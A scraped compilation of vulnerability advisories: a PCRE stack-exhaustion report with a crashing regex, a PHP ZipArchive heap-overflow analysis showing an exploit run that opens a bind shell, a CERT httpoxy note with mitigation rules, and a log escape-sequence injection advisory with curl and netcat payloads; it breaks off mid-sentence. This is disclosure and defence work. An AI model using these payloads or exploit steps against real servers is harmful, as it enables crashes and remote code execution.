D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wandetect.php.

CVE-2017-14416: Pwning the Dlink 850L routers and abusing the MyDlink Cloud protocol

In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 11 Jul 2017 10:03:01 +0800
From: "ben" <qbenjin@...com>
To: "oss-security" <oss-security@...ts.openwall.com>
Cc: "huangyonggang" <huangyonggang@...60.cn>
Subject: Re:  \[scr358145\] pcre-8.41 - 8.41

> \[Suggested description\]
> In PCRE 8.41, the OP\_KETRMAX feature in the match function in pcre\_exec.c
> allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.
> 
> ------------------------------------------
> 
> \[Additional Information\]
> This vulns like CVE-2017-9729.
> it is about line 2061 (from the https://vcs.pcre.org/pcre/code/trunk/pcre\_exec.c?revision=1683&view=markup page) of pcre\_exec.c:
> 
> RMATCH(eptr, prev, offset\_top, md, eptrb, RM13);
> 
> this recursive calls case Segmentation fault ,because of stack exhaustion.
> 
> 
>  The poc code like: 
> 
>  if(regcomp (&regtmp,"\\x28\\x61\\x2A\\x5C\\x56\\x2A\\x5C\\x43\\x2B\\x29\\x2A\\x6F\\xE5\\xA2\\x80", REG\_UTF8 )==0)
>   {  
>    regmatch\_t pmatch\[1\];
>    regexec(&regtmp, "\\x6C\\x6F\\xE5\\xA2\\x80\\x2D ",1, pmatch, 0);
>    regfree(&regtmp);
>  }
> with configure --enable-utf
> 
> ------------------------------------------
> 
> \[VulnerabilityType Other\]
> stack exhaustion
> 
> ------------------------------------------
> 
> \[Vendor of Product\]
> http://www.pcre.org/
> 
> ------------------------------------------
> 
> \[Affected Product Code Base\]
> pcre-8.41 - 8.41
> 
> ------------------------------------------
> 
> \[Affected Component\]
> pcre\_exec.c
> 
> ------------------------------------------
> 
> \[Attack Type\]
> Remote
> 
> ------------------------------------------
> 
> \[Impact Denial of Service\]
> true
> 
> ------------------------------------------
> 
> \[Attack Vectors\]
> many methods!   many program use pcre,  like: php and nginx ,please see: https://en.wikipedia.org/wiki/Comparison\_of\_regular\_expression\_engines
> 
> ------------------------------------------
> 
> \[Reference\]
> https://en.wikipedia.org/wiki/Comparison\_of\_regular\_expression\_engines
> http://www.pcre.org/
> 
> ------------------------------------------
> 
> \[Discoverer\]
> Benjin Liu, codesafe of qihoo 360 ,http://codesafe.cn

Use CVE-2017-11164.


- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
\[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request\_id.html \]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJZY7EfAAoJEHb/MwWLVhi2wBIP/jIMwxZB892scrm393PA4zM3
adhV1TQ2tkpG4ALp4zC0MhHFfVr11LuWlSxsgu/OGHBTPLYldbK+hhVOtaV7EqSB
+vrvAKEepOJKLB71AR4XpixzedQnP0+SOAgYvnpVI3LW/Yb2j2yZhhTbzh6H+5Zy
Z75mpeDH7HibIkTgFMlAJ6d/3VsN7Xmadc9YzZ7m+NvdU/r3pg+/dxQHd1zwrMPl
3V/IBVpAq0XiHUy470mruV7EUWAdB8rWIoN1AAxN61aiCrp0xZ/MIEXOqQPyswhd
bO7jrJgeCUbovhi/PZMINX67zgTVt+yOfnpgwr5wLFoTXjzES1N1sdNWruGSN/VY
SrGimn286l/bYaDCr5nY4o6W+RALuIMw/gJL6VBuJFcQ9aNpG9GH3JdT154TZwDt
HM3LHX8tGPULeVLRFn77rdmaoaWUaEYvvBb6UvwQyTn81lx6TNCu3nVULCxNnkpp
EVypMZo4SJ8nxJjfA+Ccvy1ZJimMAkb5mZvu+dVT95sN827HvYAVyvxQx1a7aeku
euBjypn84Jx+tj9q4Hgkto8qwmJGar1dWab8/qh8YH1KLpfXgIoNMlUcSWjvdB53
QPv2btH48/aHnZ5Gp+0D7CxWxUtP2FoSzghlINjakJ1/zXGhGgqJoRnF9BjZ/uTG
yuPbKM/5rrPKj9Q9Gc/t
=rH9J
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2017-11164: oss-security - Re: [scr358145] pcre-8.41

spl_array.c in the SPL extension in PHP before 5.5.37 and 5.6.x before 5.6.23 improperly interacts with the unserialize implementation and garbage collection, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free and application crash) via crafted serialized data.

CVE-2016-5771: PHP: PHP 5 ChangeLog

Multiple integer overflows in php_zip.c in the zip extension in PHP before 7.0.6 allow remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted call to (1) getFromIndex or (2) getFromName in the ZipArchive class.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 28 Apr 2016 14:44:18 +0700
From: Hans Jerry Illikainen <hji@...topia.com>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: CVE-2016-3078: php: integer overflow in ZipArchive::getFrom\*

Details
=======

An integer wrap may occur in PHP 7.x before version 7.0.6 when reading
zip files with the getFromIndex() and getFromName() methods of
ZipArchive, resulting in a heap overflow.

php-7.0.5/ext/zip/php\_zip.c
,----
| 2679 static void php\_zip\_get\_from(INTERNAL\_FUNCTION\_PARAMETERS, int type) /\* {{{ \*/
| 2680 {
| ....
| 2684     struct zip\_stat sb;
| ....
| 2689     zend\_long len = 0;
| ....
| 2692     zend\_string \*buffer;
| ....
| 2702     if (type == 1) {
| 2703         if (zend\_parse\_parameters(ZEND\_NUM\_ARGS(), "P|ll", &filename, &len, &flags) == FAILURE) {
| 2704             return;
| 2705         }
| 2706         PHP\_ZIP\_STAT\_PATH(intern, ZSTR\_VAL(filename), ZSTR\_LEN(filename), flags, sb);  // (1)
| 2707     } else {
| 2708         if (zend\_parse\_parameters(ZEND\_NUM\_ARGS(), "l|ll", &index, &len, &flags) == FAILURE) {
| 2709             return;
| 2710         }
| 2711         PHP\_ZIP\_STAT\_INDEX(intern, index, 0, sb);                                      // (1)
| 2712     }
| ....
| 2718     if (len < 1) {
| 2719         len = sb.size;
| 2720     }
| ....
| 2731     buffer = zend\_string\_alloc(len, 0);                                                // (2)
| 2732     n = zip\_fread(zf, ZSTR\_VAL(buffer), ZSTR\_LEN(buffer));                             // (3)
| ....
| 2742 }
\`----

With \`sb.size' from (1) being:

php-7.0.5/ext/zip/lib/zip\_stat\_index.c
,----
| 038 ZIP\_EXTERN int
| 039 zip\_stat\_index(zip\_t \*za, zip\_uint64\_t index, zip\_flags\_t flags,
| 040                zip\_stat\_t \*st)
| 041 {
| ...
| 043     zip\_dirent\_t \*de;
| 044
| 045     if ((de=\_zip\_get\_dirent(za, index, flags, NULL)) == NULL)
| 046         return -1;
| ...
| 063         st->size = de->uncomp\_size;
| ...
| 086 }
\`----

Both \`size' and \`uncomp\_size' are unsigned 64bit integers:

php-7.0.5/ext/zip/lib/zipint.h
,----
| 339 struct zip\_dirent {
| ...
| 351     zip\_uint64\_t uncomp\_size;        /\* (cl) size of uncompressed data \*/
| ...
| 332 };
\`----

php-7.0.5/ext/zip/lib/zip.h
,----
| 279 struct zip\_stat {
| ...
| 283     zip\_uint64\_t size;            /\* size of file (uncompressed) \*/
| ...
| 290 };
\`----

Whereas \`len' is signed and has a platform-dependent size:

php-7.0.5/Zend/zend\_long.h
,----
| 028 #if defined(\_\_x86\_64\_\_) || defined(\_\_LP64\_\_) || defined(\_LP64) || defined(\_WIN64)
| 029 # define ZEND\_ENABLE\_ZVAL\_LONG64 1
| 030 #endif
| ...
| 033 #ifdef ZEND\_ENABLE\_ZVAL\_LONG64
| 034 typedef int64\_t zend\_long;
| ...
| 043 #else
| 044 typedef int32\_t zend\_long;
| ...
| 053 #endif
\`----

Uncompressed file sizes in zip-archives may be specified as either 32-
or 64bit values; with the latter requiring that the size be specified in
the extra field in zip64 mode.

Anyway, as for the invocation of \`zend\_string\_alloc()' in (2):

php-7.0.5/Zend/zend\_string.h
,----
| 119 static zend\_always\_inline zend\_string \*zend\_string\_alloc(size\_t len, int persistent)
| 120 {
| 121     zend\_string \*ret = (zend\_string \*)pemalloc(ZEND\_MM\_ALIGNED\_SIZE(\_ZSTR\_STRUCT\_SIZE(len)), persistent); // (4)
| ...
| 133     ZSTR\_LEN(ret) = len;                                                                                  // (5)
| 134     return ret;
| 135 }
\`----

The \`size' argument to the \`pemalloc' macro is aligned/adjusted in (4)
whilst the \*original\* value of \`len' is stored as the size of the
allocated buffer in (5).  No boundary checking is done in (4) and it may
thus wrap, which would lead to a heap overflow during the invocation of
\`zip\_fread()' in (3) as the \`toread' argument is \`ZSTR\_LEN(buffer)':

php-7.0.5/Zend/zend\_string.h
,----
| 041 #define ZSTR\_LEN(zstr)  (zstr)->len
\`----

On a 32bit system:

,----
| (gdb) p/x ZEND\_MM\_ALIGNED\_SIZE(\_ZSTR\_STRUCT\_SIZE(0xfffffffe))
| $1 = 0x10
\`----

The wraparound may also occur on 64bit systems with \`uncomp\_size'
specified in the extra field (Zip64 mode; ext/zip/lib/zip\_dirent.c:463).
However, it won't result in a buffer overflow because of \`zip\_fread()'
bailing on a size that would have wrapped the allocation in (4):

php-7.0.5/ext/zip/lib/zip\_fread.c
,----
| 038 ZIP\_EXTERN zip\_int64\_t
| 039 zip\_fread(zip\_file\_t \*zf, void \*outbuf, zip\_uint64\_t toread)
| 040 {
| ...
| 049     if (toread > ZIP\_INT64\_MAX) {
| 050         zip\_error\_set(&zf->error, ZIP\_ER\_INVAL, 0);
| 051         return -1;
| 052     }
| ...
| 063 }
\`----

php-7.0.5/ext/zip/lib/zipconf.h
,----
| 130 #define ZIP\_INT64\_MAX     0x7fffffffffffffffLL
\`----

,----
| (gdb) p/x ZEND\_MM\_ALIGNED\_SIZE(\_ZSTR\_STRUCT\_SIZE(0x7fffffffffffffff))
| $1 = 0x8000000000000018
\`----


PoC
===

Against Arch Linux i686 with php-fpm 7.0.5 behind nginx \[1\]:

,----
| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
| \[\*\] this may take a while
| \[\*\] 103 of 4096 (0x67fd0)...
| \[+\] connected to 1.2.3.4:5555
| 
| id
| uid=33(http) gid=33(http) groups=33(http)
| 
| uname -a
| Linux arch32 4.5.1-1-ARCH #1 SMP PREEMPT Thu Apr 14 19:36:01 CEST
| 2016 i686 GNU/Linux
| 
| pacman -Qs php-fpm
| local/php-fpm 7.0.5-2
|     FastCGI Process Manager for PHP
| 
| cat upload.php
| <?php
| $zip = new ZipArchive();
| if ($zip->open($\_FILES\["file"\]\["tmp\_name"\]) !== TRUE) {
|     echo "cannot open archive\\n";
| } else {
|     for ($i = 0; $i < $zip->numFiles; $i++) {
|         $data = $zip->getFromIndex($i);
|     }
|     $zip->close();
| }
| ?>
\`----


Solution
========

This issue has been fixed in php 7.0.6.



Footnotes
\_\_\_\_\_\_\_\_\_

\[1\] \[https://github.com/dyntopia/exploits/tree/master/CVE-2016-3078\]


-- 
Hans Jerry Illikainen

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2016-3078: security - CVE-2016-3078: php: integer overflow in ZipArchive::getFrom*

The net/http package in Go through 1.6 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect CGI applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect a CGI application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue.

**CGI web servers assign Proxy header values from client requests to internal HTTP\_PROXY environment variables**

**Vulnerability Note VU#797896**

Original Release Date: 2016-07-18 | Last Revised: 2016-07-19

**Overview**

Web servers running in a CGI or CGI-like context may assign client request Proxy header values to internal HTTP\_PROXY environment variables. This vulnerability can be leveraged to conduct man-in-the-middle (MITM) attacks on internal subrequests or to direct the server to initiate connections to arbitrary hosts.

**Description**

**CWE-807****: Reliance on Untrusted Inputs in a Security Decision,** **CWE-454****: External Initialization of Trusted Variables or Data Stores**

Web servers running in a CGI or CGI-like context may assign client request

Proxy

header values to internal

HTTP\_PROXY

environment variables. The vulnerable behavior is the result of a naming convention for meta-variables, defined in RFC 3876, which leads to a name collision: "The HTTP header field name is converted to upper case, has all occurrences of "-" replaced with "\_" and has "HTTP\_" prepended to give the meta-variable name."

According to the researchers, a web server is vulnerable if:

1.  _A web server, programming language or framework (and in some limited situations the application itself) sets the environmental variable HTTP\_PROXY from the user supplied Proxy header in the web request, or sets a similarly used variable (essentially when the request header turns from harmless data into a potentially harmful environmental variable)._
2.  _A web application makes use of HTTP\_PROXY or similar variable unsafely (e.g. fails to check the request type) resulting in an attacker controlled proxy being used (essentially when HTTP\_PROXY is actually used unsafely)._

  
By sending a specially crafted request to a vulnerable server, a remote, unauthenticated attacker may be able to conduct MITM attacks on internal server subrequests or direct the server to initiate connections to arbitrary hosts. For more information, refer to httpoxy.org.

**Impact**

A remote, unauthenticated attacker may be able to conduct MITM attacks on internal server subrequests or direct the server to initiate connections to arbitrary hosts.

**Solution**

**Apply an update**

Where applicable, affected products and components should be updated to address this vulnerability. Check with vendors for information about patching.

Where patches are unavailable or updating is not an option, consider the following workarounds.

**Filter**

**Proxy**

**request headers**

The researchers and community have identified several filtering strategies that are product-dependent:

**Apache/CGI**

In this configuration, any language may be vulnerable (the

HTTP\_PROXY

env var is "real"). If you are using

mod\_headers

, you can unset the "

Proxy

" header with this directive:  

    RequestHeader unset Proxy

  
If you are using mod\_security, you can use a rule like (vary the action to taste):  

    SecRuleEngine On  
    SecRule &REQUEST\_HEADERS:Proxy "@gt 0"  
    "id:1000005,log,deny,msg:'httpoxy denied'"

  
Refer to Apache's response for more information.

**HAProxy**

  
    httprequest delheader Proxy

  
**lighttpd <= 1.4.40 (reject requests containing "Proxy" header)**

Create "/path/to/deny-proxy.lua", read-only to lighttpd, with content:

    if (lighty.request\["Proxy"\] == nil) then return 0 else return 403 end  

Modify lighttpd.conf to load mod\_magnet and run lua code  

    server.modules += ( "mod\_magnet" )  
   magnet.attract-raw-url-to = ( "/path/to/deny-proxy.lua" )

  
**lighttpd2 (development) (strip "Proxy" header from request)**

Add to lighttpd.conf:

    req\_header.remove "Proxy";

  
**Nginx/FastCGI**

Use this to block the

Proxy header from being passed on to PHPFPM, PHPPM, etc.  

    fastcgi\_param HTTP\_PROXY ;

  
**Nginx with proxy\_pass**

The following setting should work for people who are using "proxy\_pass" with nginx:

  
    proxy\_set\_header Proxy ;

Microsoft has provided the following guidance for IIS servers utilizing affected third-party frameworks:

**Microsoft IIS Mitigation steps:**

  
  
Update apphost.config with the following rule:

  
<system.webServer>  
   <rewrite>  
        <rules>  
            <rule name=3D"Erase HTTP\_PROXY" patternSyntax=3D"Wildcard">  
                <match url=3D"\*.\*" />  
                <serverVariables>  
                    <set name=3D"HTTP\_PROXY" value=3D />  
                </serverVariables>  
                <action type=3D"None" />  
            </rule>  
        </rules>  
    </rewrite>  
</system.webServer>

**Vendor Information**

Filter by content: Additional information available

 Sort by:

  
**CVSS Metrics**

Group

Score

Vector

Base

5.1

AV:N/AC:H/Au:N/C:P/I:P/A:P

Temporal

4.6

E:POC/RL:ND/RC:C

Environmental

1.1

CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

  
**References****Acknowledgements**

Thanks to Dominic Scheirlinck and Scott Geary of Vend for reporting this vulnerability.

This document was written by Joel Land.

**Other Information**

CVE-2016-5386: CERT/CC Vulnerability Note VU#797896

The cdf_check_stream_offset function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, relies on incorrect sector-size data, which allows remote attackers to cause a denial of service (application crash) via a crafted stream offset in a CDF file.

CVE-2014-3479: PHP: PHP 5 ChangeLog

Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors.

**Archive**

Skip to content

*   Google
*   About Google
*   Privacy
*   Terms

CVE-2012-3380: Google Code Archive - Long-term storage for Google Code Project Hosting.

WEBrick 1.3.1 in Ruby 1.8.6 through patchlevel 383, 1.8.7 through patchlevel 248, 1.8.8dev, 1.9.1 through patchlevel 376, and 1.9.2dev writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.

Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection Name Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection Systems Affected nginx 0.7.64 Varnish 2.0.6 Cherokee 0.99.30 mini\_httpd 1.19 thttpd 2.25b0 WEBrick 1.3.1 Orion 2.0.7 AOLserver 4.5.1 Yaws 1.85 Boa 0.94.14rc21 Severity Medium Impact (CVSSv2) Medium 5/10, vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) Vendor http://www.nginx.net/ http://varnish.projects.linpro.no/ http://www.cherokee-project.com/ http://www.ruby-lang.org/ http://www.acme.com/software/thttpd/ http://www.acme.com/software/mini\_httpd/ http://www.orionserver.com/ http://www.aolserver.com/ http://yaws.hyber.org/ http://www.boa.org/ Advisory http://www.ush.it/team/ush/hack\_httpd\_escape/adv.txt Authors Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it) Alessandro "jekil" Tanasi (alessandro AT tanasi DOT it) Francesco "ascii" Ongaro (ascii AT ush DOT it) Date 20100110 I. BACKGROUND nginx is a HTTP and reverse proxy server written by Igor Sysoev. Varnish is a state-of-the-art, high-performance HTTP accelerator. Cherokee is a very fast, flexible and easy to configure Web Server. thttpd is a simple, small, portable, fast, and secure HTTP server. mini\_httpd is a small HTTP server. WEBrick is a Ruby library providing simple HTTP web server services. Orion Application Server is a pure java application-server. AOLserver is America Online's Open-Source web server. Yaws is a HTTP high perfomance 1.1 webserver. Boa is a single-tasking HTTP server. II. DESCRIPTION Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa are subject to logs escape sequence injection vulnerabilites. Escape sequences are special characters sequences that are used to instruct the terminal to perform special operations like executing commands \[4, 5\] or dumping the buffer to a file \[6, 7\]. When the webserver is executed in foreground in a pty or when the logfiles are viewed with tools like "cat" or "tail" such control chars reach the terminal and are executed. III. ANALYSIS Summary: A) "nginx" log escape sequence injection (Affected versions: 0.7.64 and probably earlier versions) B) "Varnish" log escape sequence injection (Affected versions: 2.0.6 and probably earlier versions) C) "Cherokee" log escape sequence injection (Affected versions: 0.99.30 and probably earlier versions) D) "thttpd" log escape sequence injection (Affected versions: thttpd/2.25b and probably earlier versions) E) "mini\_httpd" log escape sequence injection (Affected versions: 1.19 and probably earlier versions) F) "WEBrick" log escape sequence injection (Affected versions: 1.3.1 and probably earlier versions) G) "Orion" log escape sequence injection (Affected versions: 2.0.7 and probably earlier versions) H) "AOLserver" log escape sequence injection (Affected versions: 4.5.1 and probably earlier versions) I) "Yaws" log escape sequence injection (Affected versions: 1.85 and probably earlier versions) L) "Boa" log escape sequence injection (Affected versions: 0.94.14rc21 and probably earlier versions) A) "nginx" log escape sequence injection One of the following two Proofs Of Concept can be used in order to verify the vulnerability. curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a echo -en "GET /\\x1b\]2;owned?\\x07\\x0a\\x0d\\x0a\\x0d" > payload nc localhost 80 < payload B) "Varnish" log escape sequence injection One of the following two Proofs Of Concept can be used in order to verify the vulnerability. xterm varnishlog echo -en "GET /\\x1b\]2;owned?\\x07\\x0a\\x0d\\x0a\\x0d" > payload nc localhost 80 < payload C) "Cherokee" log escape sequence injection The following Proof Of Concept can be used in order to verify the vulnerability. curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a D) "thttpd" log escape sequence injection The following Proof Of Concept can be used in order to verify the vulnerability. echo -en "GET /\\x1b\]2;owned?\\x07\\x0a\\x0d\\x0a\\x0d" > payload nc localhost 80 < payload E) "mini\_httpd" log escape sequence injection One of the following two Proofs Of Concept can be used in order to verify the vulnerability. curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a echo -en "GET /\\x1b\]2;owned?\\x07\\x0a\\x0d\\x0a\\x0d" > payload nc localhost 80 < payload F) "WEBrick" log escape sequence injection One of the following two Proofs Of Concept can be used in order to verify the vulnerability. curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a echo -en "GET /\\x1b\]2;owned?\\x07\\x0a\\x0d\\x0a\\x0d" > payload nc localhost 80 < payload G) "Orion" log escape sequence injection One of the following two Proofs Of Concept can be used in order to verify the vulnerability. curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a echo -en "GET /\\x1b\]2;owned?\\x07\\x0a\\x0d\\x0a\\x0d" > payload nc localhost 80 < payload H) "AOLserver" log escape sequence injection The following Proof Of Concept can be used in order to verify the vulnerability. echo -en "GET /\\x1b\]2;owned?\\x07\\x0a\\x0d\\x0a\\x0d" > payload nc localhost 80 < payload I) "Yaws" log escape sequence injection One of the following two Proofs Of Concept can be used in order to verify the vulnerability. curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a echo -en "GET /\\x1b\]2;owned?\\x07\\x0a\\x0d\\x0a\\x0d" > payload nc localhost 80 < payload L) "Boa" log escape sequence injection The following Proof Of Concept can be used in order to verify the vulnerability. curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a IV. DETECTION Services like Shodan (shodan.surtri.com) or Google can be used to get an approximate idea on the usage of the products. Some examples: - http://shodan.surtri.com/?q=nginx - http://www.google.com/search?q="powered+by+Cherokee" - curl -kis http://www.antani.gov | grep -E "Server: Orion/2.0.8" V. WORKAROUND Cherokee and WEBrick (Ruby) released related security fixes and releases as detailed below. Cherokee issued a public patch that resolved the issue but caused some issues (http://svn.cherokee-project.com/changeset/3944) and has been later replaced (http://svn.cherokee-project.com/changeset/3977) by a better fix that both resolve the issue and doesn't affect the normal webserver behavior. Use the second patch or a safe release like 0.99.34 or above. If you are using Cherokee 0.99.32 please note that your build uses the first patch. Webrick (Ruby) sent us the following patch and issued a release that fixes the issues. Detailed informations are available at the following url: http://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection The patch we reviewed is the following but please refer to the vendor's article for exact informations. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Index: lib/webrick/httpstatus.rb =================================================================== --- lib/webrick/httpstatus.rb (revision 26065) +++ lib/webrick/httpstatus.rb (working copy) @@ -13,5 +13,15 @@ module WEBrick module HTTPStatus - class Status < StandardError; end + class Status < StandardError + def initialize(message, \*rest) + super(AccessLog.escape(message), \*rest) + end + class << self + attr\_reader :code, :reason\_phrase + end + def code() self::class::code end + def reason\_phrase() self::class::reason\_phrase end + alias to\_i code + end class Info < Status; end class Success < Status; end @@ -69,4 +79,5 @@ module WEBrick StatusMessage.each{|code, message| + message.freeze var\_name = message.gsub(/\[ \\-\]/,'\_').upcase err\_name = message.gsub(/\[ \\-\]/,'') @@ -80,16 +91,10 @@ module WEBrick end - eval %- - RC\_#{var\_name} = #{code} - class #{err\_name} < #{parent} - def self.code() RC\_#{var\_name} end - def self.reason\_phrase() StatusMessage\[code\] end - def code() self::class::code end - def reason\_phrase() self::class::reason\_phrase end - alias to\_i code - end - - - - CodeToError\[code\] = const\_get(err\_name) + const\_set("RC\_#{var\_name}", code) + err\_class = Class.new(parent) + err\_class.instance\_variable\_set(:@code, code) + err\_class.instance\_variable\_set(:@reason\_phrase, message) + const\_set(err\_name, err\_class) + CodeToError\[code\] = err\_class } Index: lib/webrick/httprequest.rb =================================================================== --- lib/webrick/httprequest.rb (revision 26065) +++ lib/webrick/httprequest.rb (working copy) @@ -267,9 +267,5 @@ module WEBrick end end - begin - @header = HTTPUtils::parse\_header(@raw\_header.join) - rescue => ex - raise HTTPStatus::BadRequest, ex.message - end + @header = HTTPUtils::parse\_header(@raw\_header.join) end Index: lib/webrick/httputils.rb =================================================================== --- lib/webrick/httputils.rb (revision 26065) +++ lib/webrick/httputils.rb (working copy) @@ -130,9 +130,9 @@ module WEBrick value = $1 unless field - raise "bad header '#{line.inspect}'." + raise HTTPStatus::BadRequest, "bad header '#{line}'." end header\[field\]\[-1\] << " " << value else - raise "bad header '#{line.inspect}'." + raise HTTPStatus::BadRequest, "bad header '#{line}'." end } Index: lib/webrick/accesslog.rb =================================================================== --- lib/webrick/accesslog.rb (revision 26065) +++ lib/webrick/accesslog.rb (working copy) @@ -54,5 +54,5 @@ module WEBrick raise AccessLogError, "parameter is required for \\"#{spec}\\"" unless param - params\[spec\]\[param\] || "-" + param = params\[spec\]\[param\] ? escape(param) : "-" when ?t params\[spec\].strftime(param || CLF\_TIME\_FORMAT) @@ -60,8 +60,16 @@ module WEBrick "%" else - params\[spec\] + escape(params\[spec\].to\_s) end } end + + def escape(data) + if data.tainted? + data.gsub(/\[\[:cntrl:\]\\\\\]+/) {$&.dump\[1...-1\]}.untaint + else + data + end + end end end --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- VI. VENDOR RESPONSE We contacted the vendors of eleven affected webservers, counting the previous advisory \[1\] for Jetty. Three fixed the issue (Cherokee, WEBrick/Ruby and Jetty), one will not fix the issue (Varnish) and one acknowledged the issue (AOLserver). Nginx NO-RESPONSE Cherokee FIXED thttpd NO-RESPONSE mini-httpd NO-RESPONSE WEBrick FIXED Orion NO-RESPONSE AOLserver ACK Yaws NO-RESPONSE Boa NO-RESPONSE Varnish WONT-FIX The response was overall good and it was nice to work with them, in particular we want to thank Cherokee's staff, Ruby's staff, Raphael Geissert (Debian) and Steven M. Christey (Mitre) for the support. Poul-Henning Kamp (Varnish) replied to our contact email with the following email that we quote as-is. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- The official Varnish response, which I ask that you include in its entirety in your advisory, if you list Varnish as "vulnerable" in it: This is not a security problem in Varnish or any other piece of software which writes a logfile. The real problem is the mistaken belief that you can cat(1) a random logfile to your terminal safely. This is not a new issue. I first remember the issue with xterm(1)'s inadvisably implemented escape-sequences in a root-context, brought up heatedly, in 1988, possibly late 1987, at Copenhagens University Computer Science dept. (Diku.dk). Since then, nothing much have changed. The wisdom of terminal-response-escapes in general have been questioned at regular intervals, but still none of the major terminal emulation programs have seen fit to discard these sequences, probably in a misguided attempt at compatibility with no longer used 1970'es technology. I admit that listing "found a security hole in all HTTP-related programs that write logfiles" will look more impressive on a resume, but I think it is misguided and a sign of trophy-hunting having overtaken common sense. Instead of blaming any and all programs which writes logfiles, it would be much more productive, from a security point of view, to get the terminal emulation programs to stop doing stupid things, and thus fix this and other security problems once and for all. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- We would like to punctuate the following facts: 1) We totally agree that the root of the problem is an unwise design in the terminal emulators. If in 70' controls were sent out of band on a secondary channel we would not have the equivalent of Blue Boxing in the terminal. This is a known issue from years. We didn't invented this attack vector and never claimed so. We don't think that design changes will happen in the short or mid term so it's better to have a proactive approach and sanitize outputs where functionalities are likely to not be 